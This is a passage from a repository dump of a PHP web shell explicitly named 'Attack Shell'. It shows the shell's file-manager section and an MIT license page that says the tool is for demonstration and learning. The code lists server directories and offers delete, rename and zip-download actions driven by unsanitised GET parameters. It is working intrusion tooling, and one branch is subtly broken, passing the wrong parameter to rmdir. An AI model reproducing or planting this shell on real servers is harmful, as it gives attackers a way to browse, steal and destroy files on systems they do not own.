2363 |         <th class="header" width="500px">Name</th>
2364 |         <th width="100px" class="header">Size</th>
2365 |         <th width="100px" class="header">Permissions</th>
2366 |         <th width="100px" class="header">Delete</th>
2367 |         <th width="100px" class="header">Rename</th>
2368 | 	<th width="100px" class="header">Zip</th>
2369 |     </tr>
2370 |     <?php
2371 | 
2372 |     if(isset($_GET['delete']))
2373 |     {
2374 |         if(unlink(($_GET['delete'])) == FALSE)
2375 |         {
2376 |             echo "<p id='margins' class='alert_red'>Could Not Delete the FILE Specified</p>";
2377 |         }
2378 |     }
2379 | 
2380 |     else if(isset($_GET['delete_dir']))
2381 |     {
2382 |         if(rmdir(($_GET['delete'])) == FALSE)
2383 |         {
2384 |             echo "<p id='margins' class='alert_red'>Could Not Delete the DIRECTORY Specified</p>";
2385 |         }
2386 |     }
2387 | 
2388 |     if(is_dir($dir))
2389 |     {
2390 |         $handle = opendir($dir);
2391 |         if($handle != FALSE)
2392 |         {
2393 |         if($dir[(strlen($dir)-1)] != $SEPARATOR){$dir = $dir.$SEPARATOR;}
2394 |         while (($file = readdir($handle)) != false) {
2395 |                 if ($file != "." && $file != "..")
2396 |         	{
2397 | 
2398 | 		$color = 'red';
2399 | 		if(is_readable($dir.$file))
2400 | 		{
2401 | 			$color = 'yellow';
2402 | 		}
2403 | 		if(is_writable($dir.$file))
2404 | 		{
2405 | 			$color = 'green';
2406 | 		}
2407 | 
2408 |                 if(is_dir($dir.$file))
2409 |                 {
2410 |                     ?>
2411 |                     <tr>
2412 |                     <td class='dir'><a style="color: <?php echo $color?>;" href='<?php echo $self ?>?dir=<?php echo $dir.$file ?>'><b>/<?php echo $file ?></b></a></td>
2413 |                     <td class='info'><?php echo HumanReadableFilesize(dirSize($dir.$file));?></td>
2414 |                     <td class='info'><?php echo getFilePermissions($dir.$file);?></td>
2415 |                     <td class="info"><a href="<?php echo $self;?>?delete_dir=<?php echo $dir.$file;?>">Delete</a></td>
2416 |                     <td class="info"><a href="<?php echo $self;?>?rename=<?php echo $dir.$file;?>">Rename</a></td>
2417 | 		    <td class="info"><a href="<?php echo $self;?>?zip=<?php echo $dir.$file;?>">Download (zip)</a></td>
2418 |                     </tr>
2419 |                 <?php
2420 |                 }
2421 |                 //Its a file
2422 |                 else
2423 |                 {
2424 |                     ?>
2425 |                     <tr>
2426 |                     <td class='file'><a style="color: <?php echo $color?>;" href='<?php echo $self ?>?open=<?php echo $dir.$file ?>'><?php echo $file ?></a></td>
2427 |                     <td class='info'><?php echo HumanReadableFilesize(filesize($dir.$file));?></td>
2428 |                     <td class='info'><?php echo getFilePermissions($dir.$file);?></td>
2429 |                     <td class="info"><a href="<?php echo $self;?>?delete=<?php echo $dir.$file;?>">Delete</a></td>
2430 |                     <td class="info"><a href="<?php echo $self;?>?rename=<?php echo $dir.$file;?>">Rename</a></td>
2431 | 	            <td class="info"><a href="<?php echo $self;?>?zip=<?php echo $dir.$file;?>">Download (zip)</a></td>
2432 |                     </tr>
2433 |                     <?php
2434 |                 }
2435 |             }
2436 |         }
2437 |         closedir($handle);
2438 |         }
2439 |     }
2440 |     else
2441 |     {
2442 |         echo "<p class='alert_red' id='margins'>Permission Denied</p>";
2443 |     }
2444 |     ?>
2445 |     </table>
2446 |     <?php
2447 | 
2448 | }
2449 | //------------------------------------------------------------------------------------------------
2450 | ?>
2451 | 
2452 | <?php
2453 | }
2454 | // End Shell
2455 | //-------------------------------------------------------------------------------------------------
2456 | ?>
2457 | <div class="clearfooter"></div>
2458 | </div>
2459 | </body>
2460 | </html>
2461 | 


--------------------------------------------------------------------------------
/license.php:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 | <head>
 4 |     <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
 5 |     <title>Attack Shell - License</title>
 6 | 
 7 | </head>
 8 | 
 9 | <body>
10 |     <header>
11 |         <hgroup>
12 |             <h1>MIT License</h1>
13 |             <h3>Copyright (c) 2016, 2017 Franzwagner Ternus</h3>
14 |             <h4>Note: This software was intended to be used for Demonstration and Learning Purposes only. The author is not responsible for any damage it may cause and user holds full responsibility of his/her actions.</h4>
15 |         </hgroup>
16 |     </header>
17 |     <section>
18 |         <article>
19 |             <header>
20 |                 <h1></h1>
21 |             </header>
22 |             <section>
23 |               <p>
24 |                 Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
25 |               </p>
26 |               <p>
27 |                 The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
28 |               </p>
29 |               <p>
30 |                 THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
31 |               </p>
32 |             </section>
33 |         </article>
34 |     </section>
35 |       <th>
36 |         <a href="index.php">Go Back</a>
37 |       </th>
38 | </body>
39 | </html>
40 | 


--------------------------------------------------------------------------------